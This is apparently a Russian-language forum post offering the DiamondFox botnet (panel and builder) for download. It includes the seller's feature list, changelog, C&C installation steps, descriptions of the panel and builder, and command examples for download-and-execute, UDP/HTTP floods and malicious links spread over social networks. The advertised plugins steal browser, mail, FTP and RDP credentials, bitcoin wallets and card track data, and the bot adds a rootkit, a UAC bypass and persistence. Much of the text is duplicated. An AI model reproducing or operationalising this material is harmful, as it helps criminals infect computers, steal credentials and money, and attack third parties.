.gif)
Ботнет DiamondFox полностью построен на плагинах, некий такой конструктор. То есть у него нет какой то определённой узкой направленности как у ddos ботнетов, даунлоадеров и т.д., он делает это всё одинаково хорошо, и за каждую такую функцию отвечает свой плагин. Как только бот отстучался на панель далее уже можно использовать компьютер-"зомби" в ddos атаке, осуществить с него переходы на определённые сайты, установить кейлоггер или просто собрать с него все найденные пароли и т.д., подключив нужный плагин. В архиве панелька, билдер DiamondFox (для работы зарегистрируйте OCX что в той же папке лежат), есть подробный мануал в удобном формате с картинками, с установкой проблем возникнуть не должно.
Вот некоторые возможности DiamondFox:
скачать
Вот некоторые возможности DiamondFox:
Стиллер паролей из браузеров.
Стиллер паролей из FTP клиентов.
Стиллер паролей из E-Mail клиентов.
UDP/HTTP Ddos.
Кейлоггер.
Грабит сообщения из мессенджеров.
Спам.
Стиллер биткоинов.
Редактор hosts.
Размножает сам себя через социальные сети.
Download & Execute (Memory)- Скачает и выполнит приложение в памяти.
Download & Execute (Disk)- Скачает приложение на жесткий диск и выполнить его.
Open website [Visible]- Откроет сайт в браузере по умолчанию.
Open website [Hidden] - откроет сайт в скрытом режиме через эскплоер.
UDP Flood- UDP флуд на случайный порт [email protected] *Время в секундах.
HTTP Flood- HTTP флуд [email protected]@[email protected] *Время в секундах.
Activate / Deactivate Host- Запускает или останавливает редактирование Host файла
FB/Twitter Spread- Начать размножаться через фэйсбуктвиттер.
Homepage Chager- Сменить главную страницу в лисе.
Activate / Deactivate PoS- Запустить или остановить PoS grabber.
Activate Span Sender- Запускает спам - сейчас можно выбрать только одного бота для спама, этот плагин в бета-тесте.
Bitcoin Wallet Stealer- собирает биткоин кошельки с зараженных машин.
Start / Stop Keylogger- Запускает останавливает кейлогер.
Take Screenshot- Сделает скриншот.
Grab Passwords- Соберет все сохраненный пароли.
Grab FTP- Соберет все логины с файлзилы.
Grab RDP- Соберет все RDP данные.
Grab MAIL- Соберет все сохраненные Е-майл аккаунты.
Update- Обновит бота по ссылке.
Uninstall- Удалит бота.
DiamondFox is a HTTP Plugin-Based botnet made for stability and functionality, for establish a stable connection with a considerable amount of bots and will be under constant development.
This botnet doesn't have any function because its based in plugins, that means a stable connection and alot of future functions.
This Build contain the following plugins:
Browsers Password Stealer:
*Internet Explorer (Version 4.0 - 11.0)
*Mozilla Firefox (All Versions)
*Google Chrome (All Versions)
*Safari (All versions)
*Opera (All versions)
FTP Password Stealer:
*Filezilla
*April 2015: Updated for decrypt the Passwords.
Distributed Denedial of Service:
*UDP Flood in random ports
*HTTP Flood
Keylogger:
*Advanced Keyboard Hook
*Makes a easy readable html log
E-Mail Grabber:
*Outlook Express
*Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
*Microsoft Outlook 2002 to 2013 (POP3, IMAP, HTTP and SMTP Accounts)
*Windows Mail
*Windows Live Mail
*IncrediMail
*Eudora
*Netscape 6.x/7.x
*Mozilla Thunderbird
*Group Mail Free
*Yahoo! Mail
*Hotmail/MSN mail
*Gmail
Point-Of-Sales Grabber (RAM Scraper)
*Grab track2 from the Random Access Memory.
*Not working with verifon machines.
Instant messaging grabber:
*Yahoo Messenger (Versions 5.x and 6.x).
*Google Talk.
*ICQ Lite 4.x/5.x/2003.
*AOL Instant Messenger.
*Trillian.
*Trillian Astra.
*Miranda.
*GAIM/Pidgin.
*PaltalkScene.
*Digsby.
Screenshot:
*Take a Remote screenshot.
SPAM:
*Inbox Messages
*Custom SMTP
*Allow html letters
DNS Redirects:
*Remote host file editor for DNS redirections.
*Needs admin rights.
Bitcoin Wallet Stealer:
*Bitcoin core.
*Bitcoin-qt.
*MultiBit.
*Armory.
Browser Homepage Changer:
*Firefox.
Social Networks Message Spreader:
*Facebook.
*Twitter.
I give support and free updates and I'll developing more plugins for this botnet so if you have some ideas let me know.
Changelog
Built-4.2.0.302
[+] Fixed Task viewer viariable issue
[+] Fixed dangerous upload vulnerability on C&C
[+] Fixed Logout issue on the C&C
[+] Fixed Keylogger and update function issue
[+] Added installation options on the bot builder
[+] Added ramdom logo on the C&C login
[+] Added HKCU startup method
[+] Added Winlogon Startup Method
[+] Added custom install name
[+] Added %TEMP% installation dir
[+] Added %WINDIR% installation dir
[+] Added %PROGRAMFILES% installation dir
[+] Added optional melt function
[+] Added startup persistance option
[+] Added automatic keylogger installation option
[+] Added automatic PoS grabber installation option
[+] Added automatic grabbers option
[+] Added harder anti-crack methods on the bot builder
[-] Removed feedback tab
Built-4.2.0.257
[+] Improved screenshot viewer
[+] Better identification of lite bots in the webpanel
[+] Improved memory storage
[+] Improved Task status viewer
[+] Updated keylogger module
[+] All Bugs on Windows 8 Fixed
[+] Improved melt routine
[+] Improved install routine
[+] Improved bot size
[-] Removed RAR Spread
[+] Added File Extention Selector
[+] Source Code optimization
[+] Added Firefox Homepage Changer Plugin
[+] Added Facebook/Twitter message spreader Plugin
[+] Improved load time
[+] Added SysClean (Bot Remover)
[-] Fixed RES Core data bug
[-] Fixed x64 RAM plugin charge.
[-] Clipboard Bug corrected on Windows 8
[+] Added New shellcode to the runpe.
Built-4.2.0.216
[+] Added bitcoin wallet stealer.
[+] Added two methods for store the data inside the bot.
[+] added lite builder tab.
[+] added feedback tab.
[+] Added automatic grabber routine.
[+] Added trick for UAC execution.
[+] Added Lite Ring3 Rootkit using Admin rights. (Hide key in registry [All OS Versions])
[+] Added an updated FTP stealer plugin.
[+] Added an updated keylogger plugin.
[+] Added Instant messaging stealer plugin instead RDP stealer.
[+] Added anti-researcher function.
[+] Added task status viewer in the web panel.
[+] Added lite bot support in the web panel.
[+] Added compatibility between lite bot and full bot.
[+] Added automatic clipboard for User-Agent.
[+] Added automatic Xor password Generator.
[+] Added Plugin detection on the webpanel.
[+] Added new icon in builder.
[+] Added new logo in web panel.
[+] Improved Memory use.
[+] Improved UAC disambler.
[+] Improved install routine.
[+] Improved Uninstall routine.
[-] Multiple mini bugs corrected.
Built-3.1.0.4
[+] Gorynych Project
Built-2.3.0.42
[+] Pharmacy Project
Built-1.5.0.11
[+] #PHARMING Project
Installation
Open the CPanel and find "MYSQL Databases"
Create a new database
Create a new user
Add the user to the database
Give all the privileges to the user
On the cpanel find "file manager"
Upload the and decompress "panel.zip"
Open the URL where you extract the panel and you will see the installer form
Open the bot builder and fill it, "Panel:" is the URL where you extract the web panel
This options are really important, don't forget it.
Install options, fill it like you want.
Misc options, fill it like you want.
Build the bot and I suggest save the configurations.
Return to the installation form and we fill it then press "Install".
*Panel User: User for the web panel login
*Panel Password: Password for the web panel login
*User-Agent: The same number of "User-Agent" from the builder
*Connection Key: The same number of "Connection Key" from the builder
*MYSQL Server: Place where is located the Database (usually localhost)
*MYSQL User: The MYSQL user
*MYSQL Password: The password for MYSQL user
*MYSQL Database: The name of the database
If you did all correct you will be redirected to the login.
Panel
The Panel its the first part of the botnet, here the bot send and store data. The panel is protected against SQL injections and XSS attacks.
If you share the web panel I will not give you more free security updates or new functions.
Home: Show the total bots, online bots and the total logs
Clients: Show the all bots, their ID, Country, IP, PC Name, OS, Status and a full profile information.
Tasks: Show all the bots available commands and plugins status for each bot.
*You can send individual commands
*You can select for country, status or all bots
Commands:
*Download & Execute (Memory): Download and execute a file with a RUNPE
*Download & Execute (Disk): Download and execute in Hard drive
*Open website [Visible]: Open a website in the default browser
*Open website [Hidden]: Open a website Hidden using iexplorer
*UDP Flood: UDP flood in a random port
*HTTP Flood: HTTP Flood
*Activate / Deactivate Host: Start or stop the host file editor
*FB/Twitter Spread: Spread a text message through that Networks
*Homepage Chager: Change the firefox homepage
*Activate / Deactivate PoS: Start or stop the PoS grabber
*Activate Span Sender: Start the spam sender in a bot
*note: just select one bot for spam, this plugin its beta.
*Bitcoin Wallet Stealer: Steal all the bitcoin wallets in the remote machine
*Start / Stop Keylogger: start or stop the remote keylogger
*Take Screenshot: Take a remote screenshot.
*Grab Passwords: grab all stored passwords
*Grab FTP: grab all filezilla logins
*Grab RDP: grab all stored RDP
*Grab MAIL: grab all mail stored data
*Update: Update a bot from URL
*Uninstall: Uninstall
Commands Examples:
Download & Execute (Memory) http://www.site.com/file.exe
Download & Execute (Disk) http://www.site.com/file.exe
Open Website [Visible] http://www.site.com/
Open Website [Hidden] http://www.site.com/
Homepage Changer http://www.newhomesite.com
FB/Twitter Spread Hey check this out: http://www.site.com/file.exe
UDP Flood [email protected] *The time in seconds. EXAMPLE: [email protected]
HTTP Flood [email protected]@[email protected] *The time in seconds. EXAMPLE: 192.168.131.23@http:[email protected]@60
Update http://www.site.com/file.exe
Statistics
Reports
Passwords
Keylogs
PoS Data
Mails
RDP
FTP
Screenshots
Bottom Menu:
DNS Redirects
Spam Configurations
Email: Email Address
Password: Email Password
smtp: Email smtp address
Subject: Message Subject
Message: Message in HTML Format.
Email List: Email List (one line per email)
Download All Reports
Clean Dead Bots
Logout
Builder
The Builder its the second part of the botnet, this is protected with VMP and HWID so you only can use it in one computer, if you share your Builder, plugins, or a uncrypted binary you will not get free updates and support so don't be stupid.
Connection tab
*Panel: its the main connection.
*Fallback Panel: If the main panel isn't available this is the alternative connection.
*Time: Time between each connection with the panel.
Security tab
*Connection Key: Key used for the encryption of the send data.
*XOR Key: Key used for the encryption of the data inside the bot.
*User-Agent: Secret user-agent, this is used for only get connections of bots in the panel.
Installation tab
*Install Name: Name used for the installed bot.
*Install Path: Directory where the bot will be installed.
*Startup: Startup method used for the bot.
*Melt after execution: The bot will self-destroy after execution.
*Startup Persistance: The bot will watch all startup methods for keep it active.
*Install Keylogger: The bot will auto install the keylogger plugin.
*Install PoS Grabber: The bot will auto install the Point-Of-Sales grabber plugin.
*Automatic Grabbers: The bot will auto grab all passwords every startup.
Extras
Стиллер паролей из FTP клиентов.
Стиллер паролей из E-Mail клиентов.
UDP/HTTP Ddos.
Кейлоггер.
Грабит сообщения из мессенджеров.
Спам.
Стиллер биткоинов.
Редактор hosts.
Размножает сам себя через социальные сети.
Download & Execute (Memory)- Скачает и выполнит приложение в памяти.
Download & Execute (Disk)- Скачает приложение на жесткий диск и выполнить его.
Open website [Visible]- Откроет сайт в браузере по умолчанию.
Open website [Hidden] - откроет сайт в скрытом режиме через эскплоер.
UDP Flood- UDP флуд на случайный порт [email protected] *Время в секундах.
HTTP Flood- HTTP флуд [email protected]@[email protected] *Время в секундах.
Activate / Deactivate Host- Запускает или останавливает редактирование Host файла
FB/Twitter Spread- Начать размножаться через фэйсбуктвиттер.
Homepage Chager- Сменить главную страницу в лисе.
Activate / Deactivate PoS- Запустить или остановить PoS grabber.
Activate Span Sender- Запускает спам - сейчас можно выбрать только одного бота для спама, этот плагин в бета-тесте.
Bitcoin Wallet Stealer- собирает биткоин кошельки с зараженных машин.
Start / Stop Keylogger- Запускает останавливает кейлогер.
Take Screenshot- Сделает скриншот.
Grab Passwords- Соберет все сохраненный пароли.
Grab FTP- Соберет все логины с файлзилы.
Grab RDP- Соберет все RDP данные.
Grab MAIL- Соберет все сохраненные Е-майл аккаунты.
Update- Обновит бота по ссылке.
Uninstall- Удалит бота.
DiamondFox is a HTTP Plugin-Based botnet made for stability and functionality, for establish a stable connection with a considerable amount of bots and will be under constant development.
This botnet doesn't have any function because its based in plugins, that means a stable connection and alot of future functions.
This Build contain the following plugins:
Browsers Password Stealer:
*Internet Explorer (Version 4.0 - 11.0)
*Mozilla Firefox (All Versions)
*Google Chrome (All Versions)
*Safari (All versions)
*Opera (All versions)
FTP Password Stealer:
*Filezilla
*April 2015: Updated for decrypt the Passwords.
Distributed Denedial of Service:
*UDP Flood in random ports
*HTTP Flood
Keylogger:
*Advanced Keyboard Hook
*Makes a easy readable html log
E-Mail Grabber:
*Outlook Express
*Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
*Microsoft Outlook 2002 to 2013 (POP3, IMAP, HTTP and SMTP Accounts)
*Windows Mail
*Windows Live Mail
*IncrediMail
*Eudora
*Netscape 6.x/7.x
*Mozilla Thunderbird
*Group Mail Free
*Yahoo! Mail
*Hotmail/MSN mail
*Gmail
Point-Of-Sales Grabber (RAM Scraper)
*Grab track2 from the Random Access Memory.
*Not working with verifon machines.
Instant messaging grabber:
*Yahoo Messenger (Versions 5.x and 6.x).
*Google Talk.
*ICQ Lite 4.x/5.x/2003.
*AOL Instant Messenger.
*Trillian.
*Trillian Astra.
*Miranda.
*GAIM/Pidgin.
*PaltalkScene.
*Digsby.
Screenshot:
*Take a Remote screenshot.
SPAM:
*Inbox Messages
*Custom SMTP
*Allow html letters
DNS Redirects:
*Remote host file editor for DNS redirections.
*Needs admin rights.
Bitcoin Wallet Stealer:
*Bitcoin core.
*Bitcoin-qt.
*MultiBit.
*Armory.
Browser Homepage Changer:
*Firefox.
Social Networks Message Spreader:
*Facebook.
*Twitter.
I give support and free updates and I'll developing more plugins for this botnet so if you have some ideas let me know.
Changelog
Built-4.2.0.302
[+] Fixed Task viewer viariable issue
[+] Fixed dangerous upload vulnerability on C&C
[+] Fixed Logout issue on the C&C
[+] Fixed Keylogger and update function issue
[+] Added installation options on the bot builder
[+] Added ramdom logo on the C&C login
[+] Added HKCU startup method
[+] Added Winlogon Startup Method
[+] Added custom install name
[+] Added %TEMP% installation dir
[+] Added %WINDIR% installation dir
[+] Added %PROGRAMFILES% installation dir
[+] Added optional melt function
[+] Added startup persistance option
[+] Added automatic keylogger installation option
[+] Added automatic PoS grabber installation option
[+] Added automatic grabbers option
[+] Added harder anti-crack methods on the bot builder
[-] Removed feedback tab
Built-4.2.0.257
[+] Improved screenshot viewer
[+] Better identification of lite bots in the webpanel
[+] Improved memory storage
[+] Improved Task status viewer
[+] Updated keylogger module
[+] All Bugs on Windows 8 Fixed
[+] Improved melt routine
[+] Improved install routine
[+] Improved bot size
[-] Removed RAR Spread
[+] Added File Extention Selector
[+] Source Code optimization
[+] Added Firefox Homepage Changer Plugin
[+] Added Facebook/Twitter message spreader Plugin
[+] Improved load time
[+] Added SysClean (Bot Remover)
[-] Fixed RES Core data bug
[-] Fixed x64 RAM plugin charge.
[-] Clipboard Bug corrected on Windows 8
[+] Added New shellcode to the runpe.
Built-4.2.0.216
[+] Added bitcoin wallet stealer.
[+] Added two methods for store the data inside the bot.
[+] added lite builder tab.
[+] added feedback tab.
[+] Added automatic grabber routine.
[+] Added trick for UAC execution.
[+] Added Lite Ring3 Rootkit using Admin rights. (Hide key in registry [All OS Versions])
[+] Added an updated FTP stealer plugin.
[+] Added an updated keylogger plugin.
[+] Added Instant messaging stealer plugin instead RDP stealer.
[+] Added anti-researcher function.
[+] Added task status viewer in the web panel.
[+] Added lite bot support in the web panel.
[+] Added compatibility between lite bot and full bot.
[+] Added automatic clipboard for User-Agent.
[+] Added automatic Xor password Generator.
[+] Added Plugin detection on the webpanel.
[+] Added new icon in builder.
[+] Added new logo in web panel.
[+] Improved Memory use.
[+] Improved UAC disambler.
[+] Improved install routine.
[+] Improved Uninstall routine.
[-] Multiple mini bugs corrected.
Built-3.1.0.4
[+] Gorynych Project
Built-2.3.0.42
[+] Pharmacy Project
Built-1.5.0.11
[+] #PHARMING Project
Installation
Open the CPanel and find "MYSQL Databases"
Create a new database
Create a new user
Add the user to the database
Give all the privileges to the user
On the cpanel find "file manager"
Upload the and decompress "panel.zip"
Open the URL where you extract the panel and you will see the installer form
Open the bot builder and fill it, "Panel:" is the URL where you extract the web panel
This options are really important, don't forget it.
Install options, fill it like you want.
Misc options, fill it like you want.
Build the bot and I suggest save the configurations.
Return to the installation form and we fill it then press "Install".
*Panel User: User for the web panel login
*Panel Password: Password for the web panel login
*User-Agent: The same number of "User-Agent" from the builder
*Connection Key: The same number of "Connection Key" from the builder
*MYSQL Server: Place where is located the Database (usually localhost)
*MYSQL User: The MYSQL user
*MYSQL Password: The password for MYSQL user
*MYSQL Database: The name of the database
If you did all correct you will be redirected to the login.
Panel
The Panel its the first part of the botnet, here the bot send and store data. The panel is protected against SQL injections and XSS attacks.
If you share the web panel I will not give you more free security updates or new functions.
Home: Show the total bots, online bots and the total logs
Clients: Show the all bots, their ID, Country, IP, PC Name, OS, Status and a full profile information.
Tasks: Show all the bots available commands and plugins status for each bot.
*You can send individual commands
*You can select for country, status or all bots
Commands:
*Download & Execute (Memory): Download and execute a file with a RUNPE
*Download & Execute (Disk): Download and execute in Hard drive
*Open website [Visible]: Open a website in the default browser
*Open website [Hidden]: Open a website Hidden using iexplorer
*UDP Flood: UDP flood in a random port
*HTTP Flood: HTTP Flood
*Activate / Deactivate Host: Start or stop the host file editor
*FB/Twitter Spread: Spread a text message through that Networks
*Homepage Chager: Change the firefox homepage
*Activate / Deactivate PoS: Start or stop the PoS grabber
*Activate Span Sender: Start the spam sender in a bot
*note: just select one bot for spam, this plugin its beta.
*Bitcoin Wallet Stealer: Steal all the bitcoin wallets in the remote machine
*Start / Stop Keylogger: start or stop the remote keylogger
*Take Screenshot: Take a remote screenshot.
*Grab Passwords: grab all stored passwords
*Grab FTP: grab all filezilla logins
*Grab RDP: grab all stored RDP
*Grab MAIL: grab all mail stored data
*Update: Update a bot from URL
*Uninstall: Uninstall
Commands Examples:
Download & Execute (Memory) http://www.site.com/file.exe
Download & Execute (Disk) http://www.site.com/file.exe
Open Website [Visible] http://www.site.com/
Open Website [Hidden] http://www.site.com/
Homepage Changer http://www.newhomesite.com
FB/Twitter Spread Hey check this out: http://www.site.com/file.exe
UDP Flood [email protected] *The time in seconds. EXAMPLE: [email protected]
HTTP Flood [email protected]@[email protected] *The time in seconds. EXAMPLE: 192.168.131.23@http:[email protected]@60
Update http://www.site.com/file.exe
Statistics
Reports
Passwords
Keylogs
PoS Data
Mails
RDP
FTP
Screenshots
Bottom Menu:
DNS Redirects
Spam Configurations
Email: Email Address
Password: Email Password
smtp: Email smtp address
Subject: Message Subject
Message: Message in HTML Format.
Email List: Email List (one line per email)
Download All Reports
Clean Dead Bots
Logout
Builder
The Builder its the second part of the botnet, this is protected with VMP and HWID so you only can use it in one computer, if you share your Builder, plugins, or a uncrypted binary you will not get free updates and support so don't be stupid.
Connection tab
*Panel: its the main connection.
*Fallback Panel: If the main panel isn't available this is the alternative connection.
*Time: Time between each connection with the panel.
Security tab
*Connection Key: Key used for the encryption of the send data.
*XOR Key: Key used for the encryption of the data inside the bot.
*User-Agent: Secret user-agent, this is used for only get connections of bots in the panel.
Installation tab
*Install Name: Name used for the installed bot.
*Install Path: Directory where the bot will be installed.
*Startup: Startup method used for the bot.
*Melt after execution: The bot will self-destroy after execution.
*Startup Persistance: The bot will watch all startup methods for keep it active.
*Install Keylogger: The bot will auto install the keylogger plugin.
*Install PoS Grabber: The bot will auto install the Point-Of-Sales grabber plugin.
*Automatic Grabbers: The bot will auto grab all passwords every startup.
Extras
скачать
